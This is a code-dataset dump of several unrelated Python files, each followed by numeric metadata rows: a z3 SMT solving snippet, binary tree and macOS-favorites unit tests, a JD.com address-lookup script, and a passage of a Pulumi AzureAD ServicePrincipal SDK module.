output_file.write("(assert (= %s_0 %s))\n" % (i.name, transfer_to_bin(0, i.bitwidth)))
else:
for i in initial_values:
output_file.write("(assert (= %s %s))\n" % (i, transfer_to_bin(initial_values[i], get_value_bitwidth(block, i))))
output_file.seek(0)
l = output_file.read()
inps = dict()
otps = dict()
s = z3.Solver()
s.add(z3.parse_smt2_string(l))
if s.check() == z3.sat:
m = s.model()
for i in range(0, len(m)):
if m[i].name() in inputs:
inps[m[i].name()] = m[m[i]].as_long()
for i in inputs:
if i not in inps:
#inps[i] = random.randint(0, 2**get_value_bitwidth(block, i) - 1)
inps[i] = 0
#outputs = gen_outputs_for_n_cycles(block, cycle)
#for i in range(0, len(m)):
# if m[i].name() in outputs:
# otps[m[i].name()] = m[m[i]].as_long()
#print(otps)
# for i in range(0, len(m)):
# if m[i].name() in mem:
# otps[m[i].name()] = m[m[i]].as_long()
# print(otps)
return inps
else:
return {}
| 67.057971 | 299 | 0.492911 | 6,263 | 46,270 | 3.452179 | 0.027463 | 0.159845 | 0.154017 | 0.096018 | 0.919708 | 0.908145 | 0.889506 | 0.874381 | 0.86453 | 0.855927 | 0 | 0.020718 | 0.340718 | 46,270 | 689 | 300 | 67.155298 | 0.688051 | 0.018089 | 0 | 0.759812 | 0 | 0.023548 | 0.126723 | 0 | 0 | 0 | 0 | 0 | 0.069074 | 1 | 0.010989 | false | 0.00471 | 0.010989 | 0.00157 | 0.037677 | 0.00157 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a48969480ce57b0edb145244670bd1971348879 | 7,929 | py | Python | binary_tree/binary_tree_tests.py | joaojunior/data_structure | 46857d369edc288c078744d158928873be1b723e | [
"MIT"
] | null | null | null | binary_tree/binary_tree_tests.py | joaojunior/data_structure | 46857d369edc288c078744d158928873be1b723e | [
"MIT"
] | 13 | 2018-02-14T23:36:39.000Z | 2018-02-20T00:41:11.000Z | binary_tree/binary_tree_tests.py | joaojunior/data_structure | 46857d369edc288c078744d158928873be1b723e | [
"MIT"
] | null | null | null | import unittest
from binary_tree import BinaryTree, Item
def create_item(id_, value):
return Item(id_, value)
class TestBinaryTree(unittest.TestCase):
def setUp(self):
self.binary_tree = BinaryTree()
def test_empty_binary_tree(self):
self.assertEqual(0, self.binary_tree.size)
self.assertEqual(None, self.binary_tree.root)
def test_insert_one_item_in_empty_binary_tree(self):
item1 = create_item(1, 1)
self.binary_tree.insert(item1)
self.assertEqual(1, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(None, self.binary_tree.root.left)
self.assertEqual(None, self.binary_tree.root.right)
def test_insert_two_items(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.assertEqual(2, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(None, self.binary_tree.root.right)
def test_insert_three_items(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.assertEqual(3, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(item3, self.binary_tree.root.right)
def test_search_head(self):
item1 = create_item(1, 1)
self.binary_tree.insert(item1)
result = self.binary_tree.search(item1.id_)
self.assertEqual(item1, result)
def test_search_left_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
result = self.binary_tree.search(item2.id_)
self.assertEqual(item2, result)
def test_search_right_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
result = self.binary_tree.search(item3.id_)
self.assertEqual(item3, result)
def test_search_in_empty_binary_tree(self):
result = self.binary_tree.search(1)
self.assertEqual(None, result)
def test_search_item_not_exist(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
result = self.binary_tree.search(4)
self.assertEqual(None, result)
def test_remove_head_with_no_children(self):
item1 = create_item(1, 1)
self.binary_tree.insert(item1)
result = self.binary_tree.remove(item1.id_)
self.assertEqual(1, result.id_)
self.assertEqual(1, result.value)
self.assertEqual(0, self.binary_tree.size)
self.assertEqual(None, self.binary_tree.root)
def test_remove_head_with_one_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
result = self.binary_tree.remove(item1.id_)
self.assertEqual(1, result.id_)
self.assertEqual(1, result.value)
self.assertEqual(1, self.binary_tree.size)
self.assertEqual(2, self.binary_tree.root.id_)
self.assertEqual(2, self.binary_tree.root.value)
self.assertEqual(None, self.binary_tree.root.left)
self.assertEqual(None, self.binary_tree.root.right)
def test_remove_head_with_two_children(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
result = self.binary_tree.remove(item1.id_)
self.assertEqual(1, result.id_)
self.assertEqual(1, result.value)
self.assertEqual(2, self.binary_tree.size)
self.assertEqual(3, self.binary_tree.root.id_)
self.assertEqual(3, self.binary_tree.root.value)
self.assertEqual(2, self.binary_tree.root.left.id_)
self.assertEqual(2, self.binary_tree.root.left.value)
self.assertEqual(None, self.binary_tree.root.right)
def test_remove_leaf(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
result = self.binary_tree.remove(item4.id_)
self.assertEqual(item4, result)
self.assertEqual(3, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(item3, self.binary_tree.root.right)
def test_remove_middle_with_one_child(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
result = self.binary_tree.remove(item2.id_)
self.assertEqual(2, result.id_)
self.assertEqual(2, result.value)
self.assertEqual(2, result.value)
self.assertEqual(3, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(3, self.binary_tree.root.left.id_)
self.assertEqual(3, self.binary_tree.root.left.value)
self.assertEqual(item4, self.binary_tree.root.left.left)
def test_remove_middle_with_two_children(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
item5 = create_item(5, 5)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
self.binary_tree.insert(item5)
result = self.binary_tree.remove(item2.id_)
self.assertEqual(2, result.id_)
self.assertEqual(2, result.value)
self.assertEqual(4, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(3, self.binary_tree.root.left.id_)
self.assertEqual(3, self.binary_tree.root.left.value)
self.assertEqual(item4, self.binary_tree.root.left.left)
self.assertEqual(item5, self.binary_tree.root.left.right)
def test_remove_item_not_exist(self):
item1 = create_item(1, 1)
item2 = create_item(2, 2)
item3 = create_item(3, 3)
item4 = create_item(4, 4)
item5 = create_item(5, 5)
self.binary_tree.insert(item1)
self.binary_tree.insert(item2)
self.binary_tree.insert(item3)
self.binary_tree.insert(item4)
self.binary_tree.insert(item5)
result = self.binary_tree.remove(6)
self.assertEqual(None, result)
self.assertEqual(5, self.binary_tree.size)
self.assertEqual(item1, self.binary_tree.root)
self.assertEqual(item2, self.binary_tree.root.left)
self.assertEqual(item3, self.binary_tree.root.right)
self.assertEqual(item4, self.binary_tree.root.left.left)
self.assertEqual(item5, self.binary_tree.root.left.right)
if __name__ == '__main__':
unittest.main()
| 34.624454 | 65 | 0.663892 | 1,074 | 7,929 | 4.683426 | 0.054004 | 0.206759 | 0.27833 | 0.15507 | 0.903579 | 0.877932 | 0.865209 | 0.852684 | 0.819682 | 0.800596 | 0 | 0.036378 | 0.226889 | 7,929 | 228 | 66 | 34.776316 | 0.784176 | 0 | 0 | 0.756906 | 0 | 0 | 0.001009 | 0 | 0 | 0 | 0 | 0 | 0.364641 | 1 | 0.099448 | false | 0 | 0.01105 | 0.005525 | 0.121547 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
28d7974e4ff160aa77fad70f6b232c105bfb3602 | 2,202 | py | Python | test/test_interface.py | DemetriBairaktaris/PyMacFavorites | e36b3fe6216fa1735a9f971ff8ee8462df7f2be5 | [
"MIT"
] | null | null | null | test/test_interface.py | DemetriBairaktaris/PyMacFavorites | e36b3fe6216fa1735a9f971ff8ee8462df7f2be5 | [
"MIT"
] | null | null | null | test/test_interface.py | DemetriBairaktaris/PyMacFavorites | e36b3fe6216fa1735a9f971ff8ee8462df7f2be5 | [
"MIT"
] | null | null | null | import pytest
import getpass
import tempfile
import os
import py_mac_favorites
def test_get_favorites():
assert py_mac_favorites.get_favorites(getpass.getuser()) is not None
def test_is_favorite():
favorites = py_mac_favorites.get_favorites(getpass.getuser())
assert favorites
assert py_mac_favorites.is_favorite(getpass.getuser(), favorites[0])
def test_is_favorite_input_is_missing_trailing_slash():
favorites = py_mac_favorites.get_favorites(getpass.getuser())
assert favorites
favorite = favorites[0]
favorite = favorite.rstrip('/')
assert py_mac_favorites.is_favorite(getpass.getuser(), favorite)
def test_is_favorite_input_has_trailing_slash():
favorites = py_mac_favorites.get_favorites(getpass.getuser())
assert favorites
favorite = favorites[0]
favorite = favorite.rstrip('/') + '/'
assert py_mac_favorites.is_favorite(getpass.getuser(), favorite)
def test_is_favorite_none_path():
with pytest.raises(Exception):
py_mac_favorites.is_favorite(getpass.getuser(), None)
def test_is_favorite_empty_str():
with pytest.raises(Exception):
py_mac_favorites.is_favorite(getpass.getuser(), "")
def test_add_favorite():
current_favorites = py_mac_favorites.get_favorites(getpass.getuser())
new_dir = tempfile.TemporaryDirectory()
assert new_dir.name not in current_favorites
assert os.path.exists(new_dir.name)
py_mac_favorites.set_favorite(getpass.getuser(), new_dir.name)
assert py_mac_favorites.is_favorite(getpass.getuser(), new_dir.name)
py_mac_favorites.delete_favorite(getpass.getuser(), new_dir.name)
new_dir.cleanup()
def test_delete_favorite():
current_favorites = py_mac_favorites.get_favorites(getpass.getuser())
new_dir = tempfile.TemporaryDirectory()
assert new_dir.name not in current_favorites
assert os.path.exists(new_dir.name)
py_mac_favorites.set_favorite(getpass.getuser(), new_dir.name)
assert py_mac_favorites.is_favorite(getpass.getuser(), new_dir.name)
py_mac_favorites.delete_favorite(getpass.getuser(), new_dir.name)
assert not py_mac_favorites.is_favorite(getpass.getuser(), new_dir.name)
new_dir.cleanup()
| 31.457143 | 76 | 0.768392 | 297 | 2,202 | 5.346801 | 0.138047 | 0.059824 | 0.167506 | 0.11335 | 0.90806 | 0.855164 | 0.855164 | 0.826196 | 0.798489 | 0.782116 | 0 | 0.001571 | 0.132607 | 2,202 | 69 | 77 | 31.913043 | 0.829843 | 0 | 0 | 0.583333 | 0 | 0 | 0.001364 | 0 | 0 | 0 | 0 | 0 | 0.291667 | 1 | 0.166667 | false | 0.395833 | 0.104167 | 0 | 0.270833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
e917fc57ee4cfe412e05fc5c872178528d2e1660 | 6,454 | py | Python | src/address_util.py | TKaxv-7S/jd-assistant | 426940efa4254246e9eb85e32fc81f8b3728f323 | [
"MIT"
] | 16 | 2020-12-17T11:19:38.000Z | 2022-02-17T06:03:34.000Z | src/address_util.py | JackMa777/jd-assistant | 426940efa4254246e9eb85e32fc81f8b3728f323 | [
"MIT"
] | null | null | null | src/address_util.py | JackMa777/jd-assistant | 426940efa4254246e9eb85e32fc81f8b3728f323 | [
"MIT"
] | 4 | 2020-12-04T05:06:14.000Z | 2021-12-28T09:03:24.000Z | # -*- coding:utf-8 -*-
import json
import random
import time
from log import logger
def get_user_address(main_obj):
if main_obj.use_new:
address_url = 'https://wq.jd.com/deal/recvaddr/getrecvaddrlistV3'
address_params = {
'adid': '',
'reg': '1',
'r': random.random(),
'sceneval': '2'
# ,'callback': 'cbLoadAddressListA'
}
address_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://wqs.jd.com/',
'User-Agent': main_obj.user_agent
}
default_address_json = None
ipLocation = None
province_id = None
address_count = 0
time.sleep(0.05)
while True:
try:
address_resp = main_obj.sess.get(url=address_url, params=address_params,
headers=address_headers, allow_redirects=False)
default_address_json = json.loads(address_resp.text)['list'][0]
province_id = default_address_json['provinceId']
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
finally:
time.sleep(0.05)
area_url = 'https://fts.jd.com/area/get'
area_params = {
'fid': '4744'
}
area_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://item.jd.com/',
'User-Agent': main_obj.user_agent
}
address_count = 0
while True:
try:
area_resp = main_obj.sess.get(url=area_url, params=area_params,
headers=area_headers, allow_redirects=False)
area_json = json.loads(area_resp.text)
for area in area_json:
if str(area['id']) == province_id:
ipLocation = str(area['name'].encode('unicode_escape'), encoding="utf-8").replace('\\u', '%u')
break
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
cookies = main_obj.sess.cookies
# print(cookies.items())
if province_id is not None and ipLocation is not None:
# cookies.set('ipLoc-djd',
# f'{province_id}-{default_address_json["cityId"]}-0',
# domain='.jd.com', path='/')
# cookies.set('ipLocation', ipLocation, domain='.jd.com', path='/')
main_obj.area_id = f'{province_id}_{default_address_json["cityId"]}_{default_address_json["countyId"]}_{default_address_json["townId"]}'
return True
else:
return False
else:
address_url = 'https://cd.jd.com/usual/address'
address_params = {
'_': str(int(time.time() * 1000))
}
address_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://item.jd.com/',
'User-Agent': main_obj.user_agent
}
default_address_json = None
ipLocation = None
province_id = None
address_count = 0
time.sleep(0.05)
while True:
try:
address_resp = main_obj.sess.get(url=address_url, params=address_params,
headers=address_headers, allow_redirects=False)
default_address_json = json.loads(address_resp.text)[0]
province_id = default_address_json['provinceId']
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
finally:
time.sleep(0.05)
area_url = 'https://fts.jd.com/area/get'
area_params = {
'fid': '0'
}
area_headers = {
'DNT': '1',
'Sec-Fetch-Site': 'same-site',
'Sec-Fetch-Mode': 'no-cors',
'Sec-Fetch-Dest': 'script',
'upgrade-insecure-requests': '1',
'Referer': 'https://item.jd.com/',
'User-Agent': main_obj.user_agent
}
address_count = 0
while True:
try:
area_resp = main_obj.sess.get(url=area_url, params=area_params,
headers=area_headers, allow_redirects=False)
area_json = json.loads(area_resp.text)
for area in area_json:
if area['id'] == province_id:
ipLocation = str(area['name'].encode('unicode_escape'), encoding="utf-8").replace('\\u', '%u')
break
break
except Exception as e:
address_count += 1
logger.error('获取地址信息失败,重试:%s,错误:%s', address_count, e)
if address_count > 2:
exit(-1)
cookies = main_obj.sess.cookies
# print(cookies.items())
if province_id is not None and ipLocation is not None:
cookies.set('ipLoc-djd',
f'{province_id}-{default_address_json["cityId"]}-{default_address_json["countyId"]}-{default_address_json["townId"]}.{default_address_json["id"]}',
domain='.jd.com', path='/')
cookies.set('ipLocation', ipLocation, domain='.jd.com', path='/')
main_obj.area_id = f'{province_id}_{default_address_json["cityId"]}_{default_address_json["countyId"]}_{default_address_json["townId"]}'
return True
else:
return False
| 39.839506 | 171 | 0.49907 | 684 | 6,454 | 4.513158 | 0.178363 | 0.077098 | 0.099125 | 0.046647 | 0.89472 | 0.89472 | 0.89472 | 0.89472 | 0.89472 | 0.89472 | 0 | 0.013337 | 0.372637 | 6,454 | 161 | 172 | 40.086957 | 0.749074 | 0.045863 | 0 | 0.783784 | 0 | 0.013514 | 0.204423 | 0.076598 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006757 | false | 0 | 0.027027 | 0 | 0.060811 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3a6c5a25cdcc388cbdd80b9552377a4006f566c2 | 29,214 | py | Python | sdk/python/pulumi_azuread/service_principal.py | ragnarstolsmark/pulumi-azuread | b9398511c142f0aad349e492ded419f870edc925 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azuread/service_principal.py | ragnarstolsmark/pulumi-azuread | b9398511c142f0aad349e492ded419f870edc925 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azuread/service_principal.py | ragnarstolsmark/pulumi-azuread | b9398511c142f0aad349e492ded419f870edc925 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServicePrincipalArgs', 'ServicePrincipal']
@pulumi.input_type
class ServicePrincipalArgs:
def __init__(__self__, *,
application_id: pulumi.Input[str],
app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ServicePrincipal resource.
:param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
:param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
"""
pulumi.set(__self__, "application_id", application_id)
if app_role_assignment_required is not None:
pulumi.set(__self__, "app_role_assignment_required", app_role_assignment_required)
if oauth2_permission_scopes is not None:
pulumi.set(__self__, "oauth2_permission_scopes", oauth2_permission_scopes)
if oauth2_permissions is not None:
warnings.warn("""[NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""", DeprecationWarning)
pulumi.log.warn("""oauth2_permissions is deprecated: [NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""")
if oauth2_permissions is not None:
pulumi.set(__self__, "oauth2_permissions", oauth2_permissions)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> pulumi.Input[str]:
"""
The App ID of the Application for which to create a Service Principal.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: pulumi.Input[str]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="appRoleAssignmentRequired")
def app_role_assignment_required(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
"""
return pulumi.get(self, "app_role_assignment_required")
@app_role_assignment_required.setter
def app_role_assignment_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "app_role_assignment_required", value)
@property
@pulumi.getter(name="oauth2PermissionScopes")
def oauth2_permission_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]:
"""
A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
"""
return pulumi.get(self, "oauth2_permission_scopes")
@oauth2_permission_scopes.setter
def oauth2_permission_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]):
pulumi.set(self, "oauth2_permission_scopes", value)
@property
@pulumi.getter(name="oauth2Permissions")
def oauth2_permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]:
"""
(**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
"""
return pulumi.get(self, "oauth2_permissions")
@oauth2_permissions.setter
def oauth2_permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]):
pulumi.set(self, "oauth2_permissions", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags to apply to the Service Principal.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _ServicePrincipalState:
def __init__(__self__, *,
app_role_assignment_required: Optional[pulumi.Input[bool]] = None,
app_roles: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]]] = None,
application_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
oauth2_permission_scopes: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]] = None,
oauth2_permissions: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]] = None,
object_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ServicePrincipal resources.
:param pulumi.Input[bool] app_role_assignment_required: Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]] app_roles: A collection of `app_roles` blocks as documented below. For more information [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
:param pulumi.Input[str] application_id: The App ID of the Application for which to create a Service Principal.
:param pulumi.Input[str] display_name: Display name for the permission that appears in the admin consent and app assignment experiences.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]] oauth2_permission_scopes: A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]] oauth2_permissions: (**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
:param pulumi.Input[str] object_id: The Object ID of the Service Principal.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags to apply to the Service Principal.
"""
if app_role_assignment_required is not None:
pulumi.set(__self__, "app_role_assignment_required", app_role_assignment_required)
if app_roles is not None:
pulumi.set(__self__, "app_roles", app_roles)
if application_id is not None:
pulumi.set(__self__, "application_id", application_id)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if oauth2_permission_scopes is not None:
pulumi.set(__self__, "oauth2_permission_scopes", oauth2_permission_scopes)
if oauth2_permissions is not None:
warnings.warn("""[NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""", DeprecationWarning)
pulumi.log.warn("""oauth2_permissions is deprecated: [NOTE] The `oauth2_permissions` block has been renamed to `oauth2_permission_scopes` and moved to the `api` block. `oauth2_permissions` will be removed in version 2.0 of the AzureAD provider.""")
if oauth2_permissions is not None:
pulumi.set(__self__, "oauth2_permissions", oauth2_permissions)
if object_id is not None:
pulumi.set(__self__, "object_id", object_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="appRoleAssignmentRequired")
def app_role_assignment_required(self) -> Optional[pulumi.Input[bool]]:
"""
Whether this Service Principal requires an AppRoleAssignment to a user or group before Azure AD will issue a user or access token to the application. Defaults to `false`.
"""
return pulumi.get(self, "app_role_assignment_required")
@app_role_assignment_required.setter
def app_role_assignment_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "app_role_assignment_required", value)
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]]]:
"""
A collection of `app_roles` blocks as documented below. For more information [official documentation](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@app_roles.setter
def app_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalAppRoleArgs']]]]):
pulumi.set(self, "app_roles", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The App ID of the Application for which to create a Service Principal.
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
Display name for the permission that appears in the admin consent and app assignment experiences.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="oauth2PermissionScopes")
def oauth2_permission_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]:
"""
A collection of OAuth 2.0 delegated permissions exposed by the associated Application. Each permission is covered by an `oauth2_permission_scopes` block as documented below.
"""
return pulumi.get(self, "oauth2_permission_scopes")
@oauth2_permission_scopes.setter
def oauth2_permission_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionScopeArgs']]]]):
pulumi.set(self, "oauth2_permission_scopes", value)
@property
@pulumi.getter(name="oauth2Permissions")
def oauth2_permissions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]:
"""
(**Deprecated**) A collection of OAuth 2.0 permissions exposed by the associated Application. Each permission is covered by an `oauth2_permissions` block as documented below. Deprecated in favour of `oauth2_permission_scopes`.
"""
return pulumi.get(self, "oauth2_permissions")
@oauth2_permissions.setter
def oauth2_permissions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePrincipalOauth2PermissionArgs']]]]):
pulumi.set(self, "oauth2_permissions", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The Object ID of the Service Principal.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags to apply to the Service Principal.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ServicePrincipal(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
